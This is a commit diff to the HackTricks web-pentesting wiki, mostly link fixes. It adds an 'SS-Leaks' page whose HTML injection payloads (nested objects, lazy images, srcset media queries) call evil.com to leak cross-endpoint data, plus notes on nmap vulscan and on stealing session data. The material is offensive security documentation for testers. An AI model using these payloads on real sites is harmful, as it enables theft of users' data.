Para usar una BD específica: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
## Speed Up Nmap Service scan x16
According [**to this post**](https://joshua.hu/nmap-speedup-service-scanning-16x) you can speed up the nmap service analysis by modifying all the **`totalwaitms`** values in **`/usr/share/nmap/nmap-service-probes`** to **300** and **`tcpwrappedms`** to **200**.
Moreover, probes which do not have a specifically defined **`servicewaitms`** use a default value of **`5000`**. Therefore, we can either add values to each of the probes, or we can **compile nmap** ourselves and change the default value in [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

4
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -302,7 +302,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md).
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use an httpS url in the base.
@ -344,7 +344,7 @@ Other JSONP arbitrary execution endpoints can be found in [**here**](https://git
### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection.md).
Read [how here](../dangling-markup-html-scriptless-injection/).
### 'unsafe-inline'; img-src \*; via XSS

2
pentesting-web/csrf-cross-site-request-forgery.md
View File

@ -200,7 +200,7 @@ Therefore, if a GET request is being limited, you could just **send a HEAD reque
### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **GET using HTML tags**

48
pentesting-web/dangling-markup-html-scriptless-injection.md → pentesting-web/dangling-markup-html-scriptless-injection/README.md
View File

@ -4,24 +4,20 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Resume
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
## Main Applications
@ -255,12 +251,20 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
## XS-Search
## SS-Leaks
XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](xs-search.md#css-injection) or [**Lazy Load Images**](xs-search.md#image-lazy-loading)**.**
This is a **mix** between **dangling markup and XS-Leaks**. From one side the vulnerability allows to **inject HTML** (but not JS) in a page of the **same origin** of the one we will be attacking. On the other side we won't **attack** directly the page where we can inject HTML, but **another page**.
{% content-ref url="xs-search.md" %}
[xs-search.md](xs-search.md)
{% content-ref url="ss-leaks.md" %}
[ss-leaks.md](ss-leaks.md)
{% endcontent-ref %}
## XS-Search/XS-Leaks
XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search.md#css-injection) or [**Lazy Load Images**](../xs-search.md#image-lazy-loading)**.**
{% content-ref url="../xs-search.md" %}
[xs-search.md](../xs-search.md)
{% endcontent-ref %}
## Brute-Force Detection List
@ -285,14 +289,10 @@ More info:
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

89
pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md Normal file
View File

@ -0,0 +1,89 @@
# SS-Leaks
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
This is a **mix** between **dangling markup and XS-Leaks**. From one side the vulnerability allows to **inject HTML** (but not JS) in a page of the **same origin** of the one we will be attacking. On the other side we won't **attack** directly the page where we can inject HTML, but **another page**.
## Nested Objects
If the <mark style="color:yellow;">`/api/v1/leaky?secret=a`</mark> endpoint returns a 404 status code, then the inner `object` is loaded, giving a callback to <mark style="color:yellow;">`https://evil.com?callback=a`</mark> and letting us know that the search query `a` yielded no results.
```html
<object data="/api/v1/leaky?secret=a">
<object data="https://evil.com?callback=a"></object>
</object>
```
### Lazy Loading
What if CSP blocks external objects? Let's try again with the following CSP:
<mark style="color:yellow;">`Content-Security-Policy: default-src 'self'; img-src *;`</mark>
Our callback `object` from above no longer works. In its place, we can use image [lazy loading](https://developer.mozilla.org/en-US/docs/Web/Performance/Lazy\_loading)! The following image will only load when it is visible and within a certain distance from the viewport.
```html
<object data="/api/v1/leaky?secret=a">
<img src="https://evil.com?callback" loading="lazy">
</object>
```
### Responsive Images
The above technique is great, but it relies on our HTML injection being within the user's viewport.
If the injection is off-screen and the user doesn't scroll, can we still leak data? Of course, we can use element IDs and [scroll-to-text-fragment](https://chromestatus.com/feature/4733392803332096) to create a URL that forces a scroll, but these rely on user interaction and don't allow us to achieve consistent leaks in a real-world scenario. Ideally, we want to weaponise stored HTML injection in a reliable manner.
Enter responsive images! Specifically, the `srcset` and `sizes` attributes of images.
{% code overflow="wrap" %}
```html
<object data="/api/v1/leaky?secret=a">
<iframe srcdoc="<img srcset='https://evil.com?callback=1 480w, https://evil.com?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>
```
{% endcode %}
There's quite a few things to unpack here. First, remember that the inner iframe will only be visible if the leaky endpoint returns a 404 status code.
This is important because we are now going to conditionally load the image within the iframe from two different URLs. Using the `sizes` attribute, we can use [media queries](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS\_media\_queries/Using\_media\_queries) to choose which URL to load the image from, depending on the viewport size.
{% code overflow="wrap" %}
```html
<img
srcset='https://evil.com?callback=0 800w, https://evil.com?callback=1 480w'
sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'
>
```
{% endcode %}
Because our iframe has `width="1000px"`, the following happens:
1. If the leaky endpoint returns a 404 status code, the iframe is displayed and has a width of 1000px. The image within the iframe matches the `(min-width: 1000px)` media query and loads the 800px image from `https://evil.com?callback=0`.
2. If the leaky endpoint returns a 200 status code, the iframe is _not_ displayed. Since the image is not being rendered as part of a large iframe, it matches the `(max-width 999px)` media query and loads the 480px image from `https://evil.com?callback=1`.
## References
* [https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

6
pentesting-web/web-vulnerabilities-methodology/README.md
View File

@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -42,7 +42,7 @@ If the introduced data may somehow be reflected in the response, the page might
* [ ] [**Client Side Template Injection**](../client-side-template-injection-csti.md)
* [ ] [**Command Injection**](../command-injection.md)
* [ ] [**CRLF**](../crlf-0d-0a.md)
* [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection.md)
* [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/)
* [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
* [ ] [**Open Redirect**](../open-redirect.md)
* [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
@ -144,7 +144,7 @@ These vulnerabilities might help to exploit other vulnerabilities.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

4
pentesting-web/xs-search.md
View File

@ -889,8 +889,8 @@ Here you can find techniques to exfiltrate information from a cross-origin HTML
### Dangling Markup
{% content-ref url="dangling-markup-html-scriptless-injection.md" %}
[dangling-markup-html-scriptless-injection.md](dangling-markup-html-scriptless-injection.md)
{% content-ref url="dangling-markup-html-scriptless-injection/" %}
[dangling-markup-html-scriptless-injection](dangling-markup-html-scriptless-injection/)
{% endcontent-ref %}
### Image Lazy Loading

4
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -17,7 +17,7 @@
2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you bypass protections?
4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection.md)?
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
2. Inside a **HTML tag**:
1. Can you exit to raw HTML context?
2. Can you create new events/attributes to execute JS code?
@ -298,7 +298,7 @@ If in order to exploit the vulnerability you need the **user to click a link or
### Impossible - Dangling Markup
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection.md)because you could **exploit** the vulnerability **without** executing **JS** code.
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
## Injecting inside HTML tag

38
stealing-sensitive-information-disclosure-from-a-web.md
View File

@ -1,45 +1,33 @@
# Stealing Sensitive Information Disclosure from a Web
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
Here I present you the main ways to can try to achieve it:
* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
* [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>